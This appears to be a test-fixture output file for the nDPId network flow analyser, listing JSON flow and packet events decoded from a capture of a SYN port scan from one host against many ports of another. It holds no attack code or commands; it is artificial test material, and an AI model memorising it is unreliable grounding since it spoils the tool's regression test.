+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsExMAADIGA2CsEAAIQA2GNIzTAFHdU4MZAAAAAGACDAAsOwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2EAACsGfhGsEAAIQA2GNIzSDzHdUoMYAAAAAGACEAAZXgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qcAADsGKsusEAAIQA2GNIzSGaXdUoMYAAAAAGACEAAO6gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwwAACcG\/masEAAIQA2GNIzSB9fdUoMYAAAAAGACEAAguAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs8L8AADYGIbOsEAAIQA2GNIzSDMXdUoMYAAAAAGACDAAfygAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAstuoAADMGXoisEAAIQA2GNIzSA+jdUoMYAAAAAGACEAAkpwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsXSkAADsGsEmsEAAIQA2GNIzSCbzdUoMYAAAAAGACEAAe0wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsPRsAADsG0FesEAAIQA2GNIzSCpbdUoMYAAAAAGACEAAd+QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsWbIAACUGycCsEAAIQA2GNIzSE4zdUoMYAAAAAGACCAAdAwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsW3wAADkGs\/asEAAIQA2GNIzSHRPdUoMYAAAAAGACCAATfAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsRWcAADIG0QusEAAIQA2GNIzSatjdUoMYAAAAAGACDADBtgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg8AACsG62OsEAAIQA2GNIzSG1zdUoMYAAAAAGACEAANMwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsul8AACgGZhOsEAAIQA2GNIzSzcHdUoMYAAAAAGACBABmzQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsl44AAC0Gg+SsEAAIQA2GNIzSH5HdUoMYAAAAAGACCAAQ\/gAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAshnQAADQGjf6sEAAIQA2GNIzSwBfdUoMYAAAAAGACBAB0dwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060643,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_packet_id":1,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060643,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cMAADEGQa+sEAAIQA2GNIzTDPrdU4MZAAAAAGACCAAjkgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsdoQAACoGp+6sEAAIQA2GNIzTFqndU4MZAAAAAGACDAAV4wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzTAA3dU4MZAAAAAGACDAAsfwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsgdcAACwGmpusEAAIQA2GNIzTDx\/dU4MZAAAAAGACBAAlbQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsLsYAACgG8aysEAAIQA2GNIzTx5\/dU4MZAAAAAGACBABs7AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAkAADEGj2msEAAIQA2GNIzTCvndU4MZAAAAAGACCAAlkwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs8b4AAC8GJ7SsEAAIQA2GNIzTCFfdU4MZAAAAAGACEAAgNQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs48AAACcGPbKsEAAIQA2GNIzTACXdU4MZAAAAAGACEAAoZwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsBW4AADIGEQWsEAAIQA2GNIzTDQXdU4MZAAAAAGACDAAfhwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
